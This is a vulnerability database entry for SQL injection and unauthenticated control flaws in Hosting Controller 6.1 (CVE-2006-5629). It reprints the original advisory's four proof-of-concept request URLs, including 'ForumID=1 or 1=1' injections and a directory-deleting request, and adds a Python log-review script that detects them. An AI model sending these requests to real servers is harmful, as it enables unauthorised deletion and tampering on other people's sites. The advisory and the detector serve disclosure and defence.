Hotfix Hosting Controller: Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1111396 | Vulnerability type: SQL injection
Published: 2006-10-27 | Updated: 2006-11-02
CVE ID: CVE-2006-5629 | CNNVD-ID: CNNVD-200610-546
Platform: ASP | CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2662
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-546
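|Vulnerability details
Multiple SQL injection vulnerabilities in Hotfix's Hosting Controller allow remote attackers to execute arbitrary SQL commands via the ForumID parameter to (1) DisableForum.asp and (2) enableForum.asp.
|Exploit (EXP)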
Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln.

SQL_Injection, Command Injection

-------

[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006

Discussion:
--------------------
UnAuthenticated user can
1- delete every site's virtual directory on hc sites
2- make forum virtual directory (with the desired name) for every site on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection

Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory.

Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every site's virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desired name) for every site on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------

Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Institute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]

# milw0rm.com [2006-10-27]
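
A log review check for the two endpoints named above, added here as an example; it is not part of the original advisory or of Hosting Controller. It assumes IIS W3C logs with the field order shown in the comment, and the sample lines and IP addresses are constructed.

```python
import re
from urllib.parse import parse_qsl

# The two endpoints named in the advisory; IIS paths are case-insensitive.
TARGET = re.compile(r"^/forum/hcspecific/(disable|enable)forum\.asp$", re.I)

# Constructed sample log (documentation IP ranges). Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-10-28 09:14:02 192.0.2.10 GET /forum/HCSpecific/DisableForum.asp action=disableforum&ForumID=7 200
2006-10-28 09:15:40 198.51.100.23 GET /forum/HCSpecific/DisableForum.asp action=disableforum&ForumID=1+or+1=1 200
2006-10-28 09:15:58 198.51.100.23 GET /forum/hcspecific/enableforum.asp action=enableforum&forumid=1%20or%201%3D1 200
2006-10-28 09:16:30 198.51.100.23 GET /forum/HCSpecific/EnableForum.asp action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID= 200
2006-10-28 09:17:00 192.0.2.10 GET /forum/default.asp - 200
"""

def classify_forum_id(query):
    """Return (verdict, decoded value) for the ForumID parameter of a query string."""
    # ASP reads query-string keys case-insensitively, so normalise the names.
    params = {k.lower(): v for k, v in parse_qsl(query, keep_blank_values=True)}
    value = params.get("forumid", "").strip()
    if not value:
        return "missing", value
    # A forum identifier should be digits only; anything else reached the SQL query as text.
    verdict = "numeric" if re.fullmatch(r"[0-9]+", value) else "non-numeric"
    return verdict, value

def scan(log_text):
    """Return (client_ip, uri_stem, verdict, forum_id) for every hit on the endpoints."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        client_ip, stem, query = fields[2], fields[4], fields[5]
        if TARGET.match(stem):
            hits.append((client_ip, stem, *classify_forum_id(query)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "non-numeric" verdict corresponds to items 3 and 4 of the advisory; because items 1 and 2 need no injection, "numeric" and "missing" hits on these endpoints from unexpected clients still merit review on installations without Hotfix 3.3.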
|References

Source: BID
Name: 20661
Link: http://www.securityfocus.com/bid/20661
Source: MISC
Link: http://www.kapda.ir/advisory-442.html
Source: SECTRACK
Name: 1017103
Link: http://securitytracker.com/id?1017103
Source: XF
Name: hostingcontroller-multiple-sql-injection(39036)
Link: http://xforce.iss.net/xforce/xfdb/39036
Source: BID
Name: 26862
Link: http://www.securityfocus.com/bid/26862
Source: BUGTRAQ
Name: 20071213HostingController-MultipleSecurityBugs(ExtremelyCritical)
Link: http://www.securityfocus.com/archive/1/archive/1/485028/100/0/threaded
Source: MILW0RM
Name: 4730
Link: http://www.milw0rm.com/exploits/4730
Source: VUPEN
Name: ADV-2006-4296
Link: http://www.frsirt.com/english/advisories/2006/4296
Source: SECUNIA
Name: 22607
Link: http://secunia.com/advisories/22607
Source: SECUNIA
Name: 28973
Link: http://secunia.com/advisories/28973
Source: hostingcontroller.com
Link: http://hostingcontroller.com/english/logs/Post-Hotfix-3_3-sec-Patch-ReleaseNotes.html